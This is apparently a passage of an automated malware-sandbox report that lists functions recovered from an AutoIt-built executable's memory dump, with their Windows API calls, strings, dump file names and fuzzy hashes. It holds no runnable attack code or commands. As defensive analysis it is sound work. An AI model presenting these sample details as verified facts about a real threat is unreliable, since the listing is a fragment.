SetLastError.KERNEL32(00000000,?,?,?,?,00BDE6D1,?,00C78A48,00000010,00BB4F4A,?,?,00000000,00BF3CD6), ref: 00BE2DEC
_abort.LIBCMT ref: 00BE2DF2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: bf72a5dbdd783a08404e12fc89144616eb4cccf7c649d2f99d11ef4e28ddb40f
Instruction ID: e22d1264264773f7168906c3e0731ddd462b56852632a621e466643d200021ac
Opcode Fuzzy Hash: bf72a5dbdd783a08404e12fc89144616eb4cccf7c649d2f99d11ef4e28ddb40f
Instruction Fuzzy Hash: 61F0A93590558127C25227376C4AB5E17DDEFC27A5F3585B9FA25D22B2EF2488414160

Function 00C48A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC9693
Part of subcall function 00BC9639: SelectObject.GDI32(?,00000000), ref: 00BC96A2
Part of subcall function 00BC9639: BeginPath.GDI32(?), ref: 00BC96B9
Part of subcall function 00BC9639: SelectObject.GDI32(?,00000000), ref: 00BC96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C48A4E
LineTo.GDI32(?,00000003,00000000), ref: 00C48A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C48A70
LineTo.GDI32(?,00000000,00000003), ref: 00C48A80
EndPath.GDI32(?), ref: 00C48A90
StrokePath.GDI32(?), ref: 00C48AA0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 758099572a75cbafcb145cf816801d9e8200054b6e549ee00fde75cdef4d18ae
Instruction ID: eaaa93c8d435346ab8a8aed9b9f48507411e4dfb4f9a61187441851f750df579
Opcode Fuzzy Hash: 758099572a75cbafcb145cf816801d9e8200054b6e549ee00fde75cdef4d18ae
Instruction Fuzzy Hash: 5A11F376001108FFEB129F90DC88FAE7FACFB09350F048022BA199A1B1C7719E55DBA0

Function 00C151FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C15218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C15229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C15230
ReleaseDC.USER32(00000000,00000000), ref: 00C15238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C1524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C15261

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e9d03b334cf6c9b85f135c6e063cd60e5f42052abf82b9aa49d5a255453667bf
Instruction ID: 9e60d29d41a2783cadf063ef8a939c0abb392ac1ffe6d245011f01a7afda9ad0
Opcode Fuzzy Hash: e9d03b334cf6c9b85f135c6e063cd60e5f42052abf82b9aa49d5a255453667bf
Instruction Fuzzy Hash: A9018F75A01708BBEB109BE59C89B8EBFB8FB49351F044065FA04A7291D6709901CBA0

Function 00BB1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BB1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00BB1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BB1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BB1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00BB1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BB1C22

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ad0836e0f6c6897b50b3e5d435299eea8dc23ff755ba4a34934fdc1007d60142
Instruction ID: 81b60477b24c562aae8da97ca80123a0f671a05fcda219f92ba2dc3b7c53e4f7
Opcode Fuzzy Hash: ad0836e0f6c6897b50b3e5d435299eea8dc23ff755ba4a34934fdc1007d60142
Instruction Fuzzy Hash: E60167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CFE5

Function 00C1EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C1EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C1EB46
GetWindowThreadProcessId.USER32(?,?), ref: 00C1EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C1EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C1EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C1EB75

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: f2445ff1d90395bb641b4bf57dea7547f7ea51f7dcbcf5ca7af029a96083b7b0
Instruction ID: 0a2b455b670bd6bc62cf9860edc878534c51c7f6c82ff78e4d2ff4ad9385e00a
Opcode Fuzzy Hash: f2445ff1d90395bb641b4bf57dea7547f7ea51f7dcbcf5ca7af029a96083b7b0
Instruction Fuzzy Hash: 8FF03A7A642158BBE7615B629C4EFEF3A7CFFCBB11F004158FA11E10A1D7A05A01C6B5

Function 00C07439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00C07452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00C07469
GetWindowDC.USER32(?), ref: 00C07475
GetPixel.GDI32(00000000,?,?), ref: 00C07484
ReleaseDC.USER32(?,00000000), ref: 00C07496
GetSysColor.USER32(00000005), ref: 00C074B0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: eedbdde88d89bf9151c9ef3ad986aeb08cfd2321df7ca642c8213dbfc2d4bc75
Instruction ID: 3b76ede428de45978d60ac66408c8917005df4e7e687f039b596ced660a249fe
Opcode Fuzzy Hash: eedbdde88d89bf9151c9ef3ad986aeb08cfd2321df7ca642c8213dbfc2d4bc75
Instruction Fuzzy Hash: BB018635801205EFEB905FA4DC48BEE7BB5FB05321F214164F926A20B1CB312E41EF10

Function 00C11874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C1187F
UnloadUserProfile.USERENV(?,?), ref: 00C1188B
CloseHandle.KERNEL32(?), ref: 00C11894
CloseHandle.KERNEL32(?), ref: 00C1189C
GetProcessHeap.KERNEL32(00000000,?), ref: 00C118A5
HeapFree.KERNEL32(00000000), ref: 00C118AC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 7a015997882e2be27e05dfa95010298a50a8ffd9ea31adcf466fa9f19e03c7a4
Instruction ID: a7b5c35642d5d3cad30dde7f2003a5404dfde3c61c44987ce0f8b6544df4132d
Opcode Fuzzy Hash: 7a015997882e2be27e05dfa95010298a50a8ffd9ea31adcf466fa9f19e03c7a4
Instruction Fuzzy Hash: 55E0E53A606101BBDB415FA1ED4CB4EBF39FF4AB22B108220F22581070CB329430DF50

Function 00C1C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7620: _wcslen.LIBCMT ref: 00BB7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C1C6EE
_wcslen.LIBCMT ref: 00C1C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C1C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C1C7CA

Strings

0, xrefs: 00C1C6AF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 717b476e9a86fba1dd8d84d2fb210434a67256baf9ce8245d7996e140b86d829
Instruction ID: 9846d11ea68f6ffc563f2e0376c0096adc2df1f3163ddc4ddd91baf3b5addd76
Opcode Fuzzy Hash: 717b476e9a86fba1dd8d84d2fb210434a67256baf9ce8245d7996e140b86d829
Instruction Fuzzy Hash: 6E51D0716843019BD7109F28C8C5BFF77E8AF46314F040A6DF9A5D21E0DBA0DA84EB96

Function 00C3AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00C3AEA3

Part of subcall function 00BB7620: _wcslen.LIBCMT ref: 00BB7625

GetProcessId.KERNEL32(00000000), ref: 00C3AF38
CloseHandle.KERNEL32(00000000), ref: 00C3AF67

Strings

<, xrefs: 00C3AE6B
@, xrefs: 00C3AE72

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 689a3422dab744246a53c0d287f3c18e44310c8c3cdcbaff4d0934607bf8c89b
Instruction ID: 120a40723ba756ea993e425885e1cfde3107dd29ea278232f7e77e3b90a04a00
Opcode Fuzzy Hash: 689a3422dab744246a53c0d287f3c18e44310c8c3cdcbaff4d0934607bf8c89b
Instruction Fuzzy Hash: 62719C70A10615DFCB14DF94C495AAEBBF0FF08310F048499E856AB3A2CB74EE55CB91

Function 00C1719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C17206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C1723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C1724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C172CF

Strings

DllGetClassObject, xrefs: 00C17242

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 7c5b08c206c586122f33ff3fa9349eaaea9d665cc195102a8efff159eed19aa6
Instruction ID: eeebd60e9f2e8ab0e0a8aba4b9acfeab9aebd6099ddb9745fc385094b5718d6d
Opcode Fuzzy Hash: 7c5b08c206c586122f33ff3fa9349eaaea9d665cc195102a8efff159eed19aa6
Instruction Fuzzy Hash: A6415E71604204EFDB15CF54C884BDA7BB9EF4A310F1481A9BD05DF20AD7B1DA86EBA0

Function 00C43D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C43E35
IsMenu.USER32(?), ref: 00C43E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C43E92
DrawMenuBar.USER32 ref: 00C43EA5

Strings

0, xrefs: 00C43D89

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 3130aae306aefe4b749fe2072fef6027e5cd82e969971f2b0af1b3074e5c90e1
Instruction ID: 6689d8516968514108fca21b90fbb0585d57fdcf834310c3c149b97602f9b60c
Opcode Fuzzy Hash: 3130aae306aefe4b749fe2072fef6027e5cd82e969971f2b0af1b3074e5c90e1
Instruction Fuzzy Hash: 79414875A02249AFDB10DF50D884AAEBBB9FF89360F044169ED25A7250D730AE45DF60

Function 00C11DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C13CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C11E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C11E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C11EA9

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

Strings

ComboBox, xrefs: 00C11DF0
ListBox, xrefs: 00C11E25

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 9b2b5a26d2134697c62787a9c093babfcd7e88719d7b2fc1e23986a1702cb253
Instruction ID: a0337b2ea9a1f07c61a7e90caa3578f7ccaae17a6bff37fb3440f56f9d0e2c26
Opcode Fuzzy Hash: 9b2b5a26d2134697c62787a9c093babfcd7e88719d7b2fc1e23986a1702cb253
Instruction Fuzzy Hash: 46214971A00104BFDB14ABA0CC8ADFFB7B8EF42350B148169FD25A31E1DB784E45A620

Function 00C42F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C42F8D
LoadLibraryW.KERNEL32(?), ref: 00C42F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C42FA9
DestroyWindow.USER32(?), ref: 00C42FB1

Strings

SysAnimate32, xrefs: 00C42F68

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 4db712dac5ac46ff1687e40958cd7359deb96b61162f5b3286a8a8fa6d037373
Instruction ID: f9c5ffd8dda4629f3e23f4aa36e8a782e820c80ccf526dead3a3add58564ac03
Opcode Fuzzy Hash: 4db712dac5ac46ff1687e40958cd7359deb96b61162f5b3286a8a8fa6d037373
Instruction Fuzzy Hash: 71219A71200229ABFB104FA4DC82FBB3BBDFB59364F904228F960D21A0D771DC959760

Function 00BD4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BD4D1E,00BE28E9,?,00BD4CBE,00BE28E9,00C788B8,0000000C,00BD4E15,00BE28E9,00000002), ref: 00BD4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00BD4D1E,00BE28E9,?,00BD4CBE,00BE28E9,00C788B8,0000000C,00BD4E15,00BE28E9,00000002,00000000), ref: 00BD4DC3

Strings

CorExitProcess, xrefs: 00BD4D98
mscoree.dll, xrefs: 00BD4D86

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b2cab51f9a9fb8cbab5ab7cd7760de5444c71cb78f6e96977d9630c733ac712d
Instruction ID: 56309ab1c82c3ad1e61e1917406636ac5699883b396df4deb3487cd33456f854
Opcode Fuzzy Hash: b2cab51f9a9fb8cbab5ab7cd7760de5444c71cb78f6e96977d9630c733ac712d
Instruction Fuzzy Hash: 40F04F39A41208BBDB519F90DC89BAEBFF5EF48752F0000A9F809A2260DB715D80CA94

Function 00C0D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00C0D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C0D3BF
FreeLibrary.KERNEL32(00000000), ref: 00C0D3E5

Strings

X64, xrefs: 00C0D2A8
GetSystemWow64DirectoryW, xrefs: 00C0D3B9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 543b9dd29ca7442c2bf2935bbb7f592edba3138d8c57b781b934bb81b5e363e8
Instruction ID: bf2e550ad6755cf68273bc07e25e5c05820583dfe2c1507fef5e2b5c2354c384
Opcode Fuzzy Hash: 543b9dd29ca7442c2bf2935bbb7f592edba3138d8c57b781b934bb81b5e363e8
Instruction Fuzzy Hash: A9F0E57A806A21EBD7B167518C98B6DB774BF11B01F5581A9F817E20B4DB20CE44CB86

Function 00BB4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BB4EDD,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BB4EAE
FreeLibrary.KERNEL32(00000000,?,?,00BB4EDD,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4EC0

Strings

kernel32.dll, xrefs: 00BB4E94
Wow64DisableWow64FsRedirection, xrefs: 00BB4EA8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: ccd8c1354e3a7455d1e9ce4ec41c8c26cbde28593d6cf621c1fc12b7870c5ccf
Instruction ID: 7f6ad32f26a2db6c296ade3e561a2ad005860c0693073eefd6088874455c7d5c
Opcode Fuzzy Hash: ccd8c1354e3a7455d1e9ce4ec41c8c26cbde28593d6cf621c1fc12b7870c5ccf
Instruction Fuzzy Hash: 7EE0CD3AA035225BD27117296C58BBF6594FF82F627050165FC04D2122DBE0CD0185A1

Function 00BB4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

